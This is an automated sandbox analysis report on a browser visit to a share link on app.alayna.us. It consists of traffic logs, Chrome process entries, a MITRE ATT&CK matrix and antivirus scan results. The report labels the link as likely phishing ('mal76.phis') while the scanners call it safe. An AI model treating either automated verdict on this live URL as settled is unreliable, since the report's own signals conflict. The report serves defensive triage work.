              Source: unknownHTTP traffic detected: POST /report/v4?s=AW8eoUYW9oj1Yjl3MIthJhwQDxBo65b9C2uSzEBIJ126msqmF5iUla4NpK0zVyYJSfkojXAaxGml778M%2Fjx%2BaFMcOV2BJxkgdv%2BPQcaTMejVC7s6wd38SFYlqybB%2BUnEEgZS%2FOyR9u08YF3h7VUf7tSW HTTP/1.1Host: a.nel.cloudflare.comConnection: keep-aliveContent-Length: 434Content-Type: application/reports+jsonUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 25 Feb 2025 21:20:04 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 25 Feb 2025 21:20:15 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Tue, 25 Feb 2025 21:20:16 GMTContent-Type: text/htmlContent-Length: 548Strict-Transport-Security: max-age=31536000; includeSubDomains; preloadVia: 1.1 googleAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Connection: close
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundcontent-length: 237bucket: favicon.icox-amz-request-id: tx00000a3f0efef2e6f5d6f-0067be3411-6e038db4-ewr1accept-ranges: bytescontent-type: application/xmldate: Tue, 25 Feb 2025 21:20:17 GMTstrict-transport-security: max-age=31536000; includeSubDomainsconnection: close
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50148 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50147 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50136 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49676 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 50149 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50135
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50137
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50136
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50144 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50149
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50144
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50025
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50146
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50148
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50147
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50150
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50031
              Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50137 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50025 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 49677 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 50150 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 50146 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
              Source: classification engineClassification label: mal76.phis.win@19/78@72/443
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,8083160101863709475,10945907366538718763,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.alayna.us/share/r/RM0eszjvKf"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=2020,i,8083160101863709475,10945907366538718763,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation2
              Browser Extensions
              1
              Process Injection
              1
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Registry Run Keys / Startup Folder
              1
              Registry Run Keys / Startup Folder
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://app.alayna.us/share/r/RM0eszjvKf0%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://app.alayna.us/client/assets/Layout.WVpeZX22.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.KaME38Zl.js0%Avira URL Cloudsafe
              https://widget.intercom.io/widget/qer2dd6p0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Modal.Bgpq4lFm.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/sw.js0%Avira URL Cloudsafe
              https://cdnjs.cloudflare.com/ajax/libs/draft-js/0.7.0/Draft.min.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.CLF8hfvb.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/imgs/favicon-askalayna.svg0%Avira URL Cloudsafe
              https://js.intercomcdn.com/vendor.2947c1f5.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Layout.CsRrMVM6.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/index.CmaSzYmM.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Offline.Chq9LeuO.js0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/decode.I0H7hHej.js0%Avira URL Cloudsafe
              https://js.intercomcdn.com/frame.cab515ec.js0%Avira URL Cloudsafe
              https://o4505928814231552.ingest.sentry.io/api/4505968358326272/envelope/?sentry_version=7&sentry_key=7891508b33b6a44378926ce96ad52c44&sentry_client=sentry.javascript.react%2F8.55.00%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/Layout.CYQvu7YC.css0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ActivateUser.CFVvUFSP.js0%Avira URL Cloudsafe
              https://app.alayna.us/index.tsx0%Avira URL Cloudsafe
              https://app.alayna.us/client/assets/ShareResourceScene.BY3t8mu1.js0%Avira URL Cloudsafe
